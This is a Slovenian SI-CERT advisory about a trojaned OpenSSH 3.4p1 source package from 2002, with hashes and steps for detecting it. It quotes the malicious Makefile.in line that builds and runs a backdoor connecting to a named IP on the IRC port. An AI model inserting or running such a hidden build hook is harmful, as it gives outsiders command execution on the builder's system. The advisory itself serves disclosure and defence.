Skoči na vsebino

SI-CERT 2002-04 / Trojanski konj v OpenSSH 3.4p1

OpenSSH verzija 3.4p1 za operacijski sistem OpenBSD lahko vsebuje dodatni program, ki ogrozi varnost sistema, na katerem se je program prevedel.

Opis

OpenSSH je implementacija SSH protokola, ki omogoča šifriranje podatkov med računalniki in se uporablja v glavnem za interaktivno delo na oddaljenem računalniku, kopiranje datotek in vzpostavitev šifriranih tunelov za poljubne servise.

Kopija OpenSSH paketa, ki se je znašla 31.7.2002 na ftp.freebsd.org vsebuje spremembe v datoteki Makefile.in, ki prevedejo in zaženejo dodaten program:

@ $(CC) bf-test.c -o bf-test; ./bf-test>bf-test.out; sh ./bf-test.out &

Program bf-test.c se poveže na IP naslov 203.62.158.32, vrata 6667 (irc) in od tam sprejema ukaze, ki se na sistemu izvajajo pod pravicami uporabnika, ki je OpenSSH paket prevajal.

Po zagonu bf-test.out se zgornja vrstica v Makefile.in izbrise!

Rešitve

<dl><dt>Preverite MD5 podpis openssh-3.4p1.tar.gz </dt><dd>

Pravilen podpis 459c1d0262e939d6432f193c7a4ba8a8
Podpis trojanske verzije 3ac9bc346d736b4a51d676faa2a08a57

</dd><dt>Preverite, ali OpenSSH 3.4p1 paket vsebuje bf-test.c</dt><dd>

Pred prevajanjem preverite, ali datoteka Makefile.in vsebuje zgoraj navedeno vrstico, ki prevede bf-test.c. Če ste paket že prevedli in je paket vseboval trojanskega konja, je ta izbrisal zgornjo vrstico iz Makefile.in

</dd></dl>

Preberite tudi

SI-CERT 2026-02 / Ranljivost v WordPress vtičniku PixelYourSite

WordPress vtičnik PixelYourSite vsebuje ranljivost z visoko resnostjo, ki omogoča vstavljanje in trajno shranjevanje zlonamerne kode v vsebino spletnega mesta
Več

SI-CERT 2026-01 / Ranljivosti Cisco Catalyst SD-WAN

Prva objava: 25. februar 2026Zadnje urejanje: 26. februar 2026 Povzetek Podjetje Cisco je objavilo več ranljivosti Cisco Catalyst SD-WAN Controller in Cisco Catalyst SD-WAN Manager naprav, ki se že aktivno …
Več

SI-CERT 2025-08 / F5 izpostavljenost izvorne kode

Napadalci so avgusta 2025 pridobili dolgotrajen nepooblaščen dostop do nekaterih notranjih sistemov F5, vključno z razvojnim okoljem za BIG‑IP in platformami za upravljanje inženirskega znanja. Ukradli so občutljive podatke, med njimi del izvorne kode BIG‑IP, in informacije o nerazkritih ranljivostih. Podajamo nasvete za skrbnike F5 sistemov.
Več